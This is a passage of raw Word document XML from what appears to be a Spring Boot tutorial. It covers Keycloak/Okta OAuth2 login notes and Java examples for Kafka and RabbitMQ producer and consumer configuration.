      </w:r>
    </w:p>
    <w:p w14:paraId="29CBB0C6"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Keycloak/Okta Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Security supports OAuth2 and OIDC protocols out of the box for integrating with external identity providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649533B"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onfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The application.yml or application.properties file is used to define OIDC settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460AB3D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Spring Security Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @EnableWebSecurity and oauth2Login() for easy integration with OAuth2 login flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2C5F5"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Custom User Details</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Access user information from the identity provider through OAuth2User.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369102F9"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT Token Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once authenticated, use the JWT access token for making authenticated API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742BE26C" w14:textId="77777777" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00FF0B50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This integration approach allows you to centralize authentication via a trusted identity provider like Keycloak or Okta, while Spring Security handles the OAuth2 flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCBE72B"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73CCC">
          <v:rect id="_x0000_i2854" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C701617" w14:textId="3CBE4C0F"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5" w:name="_Toc197867909"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement asynchronous communication between Spring Boot microservices using message broker like Kafka or RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
    </w:p>
    <w:p w14:paraId="66FDB181" w14:textId="2FD5C9A0" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="00860C60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To implement asynchronous communication between </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a message broker like </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w: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you can follow these steps. The general flow involves one service publishing messages to a message broker, and another service consuming these messages asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F928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Here’s how you can integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w: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xml:space="preserve"> for asynchronous communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6329D"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CBD6243">
          <v:rect id="_x0000_i2855" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00B9DB"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1. Implementing Asynchronous Communication with Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6D41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Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a distributed event streaming platform used for building real-time data pipelines and streaming applications. It allows services to communicate asynchronously by publishing messages to topics, which can be consumed by other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23640FF0"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a. Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C434E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Add Kafka dependencies to your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DEC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Maven (pom.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D093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0AB5BEC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groupId&gt;org.springframework.kafka&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964B8D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artifactId&gt;spring-kafka&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815486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5386BDB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Gradle (build.gradle)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329788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implementation 'org.springframework.kafka:spring-kafka'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190121AB"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b. Configure Kafka Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B755C2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Producer Service</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, configure a Kafka producer to send messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C7B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36F47D2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EnableKafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7295D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ProducerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA396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EAA2E3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41BCCEF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ProducerFactory&lt;String, String&gt; producerFactory() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D071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ap&lt;String, Object&gt; configProps = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E6C98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BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");  // Kafka broker URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD889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KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE1F8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figProps.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750CAF5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DefaultKafkaProducerFactory&lt;&gt;(configProps);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AED3D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8021DC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43DFF8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98044B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KafkaTemplate&lt;String, String&gt; kafkaTemplate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8B58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KafkaTemplate&lt;&gt;(producerFactory());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9242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5ADE9A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0BE89511"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c. Send a Message from the Producer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB5CE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send a message to a Kafka topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D17FEC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4C970C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ProducerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5ECCC" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A377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final KafkaTemplate&lt;String, String&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE6C2E" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1318F10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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3B55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KafkaProducerService(KafkaTemplate&lt;String, String&gt; kafkaTemplate) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AFD67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this.kafkaTemplate = kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C37E9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ADCBEF3" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1196446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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBBC6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kafkaTemplate.send("your-topic-name", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0774B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1C164E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1ED8F32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d. Configure Kafka Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4BDE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Consumer Service</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, configure a Kafka consumer to listen for incoming messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F25996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407C2DB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EnableKafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F278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ConsumerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BA131" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C33BED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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C7F5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ConcurrentMessageListenerContainerFactory&lt;String, String&gt; messageListenerContainerFactory() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D180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currentMessageListenerContainerFactory&lt;String, String&gt; factory =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F709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new ConcurrentMessageListenerContainerFactory&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF964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factory.setConsumerFactory(new DefaultKafkaConsumerFactory&lt;&gt;(consumerConfigs()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3586A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factory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A77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3851C3FE" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D8B1A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Map&lt;String, Object&gt; consumerConfigs() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2521D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ap&lt;String, Object&gt; props = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90602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BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC61F6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GROUP_ID_CONFIG, "your-consumer-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF548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KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749F1D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ops.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0A80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props;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB720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4E2740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7E8AD3B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e. Listen to Kafka Messages in the Consumer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8E7C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consume messages asynchronously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38107E1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6BC2B03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KafkaConsumerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF2917" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40081B9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KafkaListener(topics = "your-topic-name", groupId = "your-consumer-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218421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listen(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABF69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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B21072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D1D4C4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5802F33D"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F99FB">
          <v:rect id="_x0000_i2856" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A49A6"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2. Implementing Asynchronous Communication with RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B281A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RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a message broker that enables services to communicate with each other asynchronously. It works by publishing messages to queues, and consumers retrieve messages from those queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C935F1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a. Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4012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Add RabbitMQ dependencies to your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DCC9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Maven (pom.xml)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE0A3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159A4ED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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEB7A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lt;artifactId&gt;spring-boot-starter-amqp&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467DC6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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7EC75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Gradle (build.gradle)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB2145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implementation 'org.springframework.boot:spring-boot-starter-amqp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C44A1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b. Configure RabbitMQ Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B3C9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Producer Service</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, configure a RabbitMQ producer to send messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FED0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00A4272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ProducerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E5982" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3CAA5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2860AAD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Queue queue() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8684F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Queue("your-queue-name", false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A804E6"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76D0A71F" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA8399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79B6FE7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TopicExchange exchange() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E2C6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TopicExchange("your-exchange-name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A0C0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27BA987" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D23831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766934D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public Binding binding(Queue queue, TopicExchange exchange) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DF9D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BindingBuilder.bind(queue).to(exchange).with("your-routing-key");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207B5F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3CDC3898" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6773E8B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4B3E25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RabbitTemplate rabbitTemplate(ConnectionFactory connectionFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE007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new RabbitTemplate(connectionFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226584B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BA0468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3EBD924A"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c. Send a Message from the Producer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1E90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send a message to the RabbitMQ queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375FB6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003A5EE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ProducerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A58B95C" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CBE3A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rivate final RabbitTemplate rabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E94EBD" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717E970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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074D6B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RabbitMQProducerService(RabbitTemplate rabbitTemplate) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5ED96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this.rabbitTemplate = rabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC79FA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5744DC4D" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C461F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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE50F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abbitTemplate.convertAndSend("your-exchange-name", "your-routing-key", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3E0BA"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01F11BB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19C1BECF"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d. Configure RabbitMQ Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C1D7E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In your </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Service</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, configure a RabbitMQ consumer to listen for incoming messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F858FF0"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFD92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ConsumerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296AADD2" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
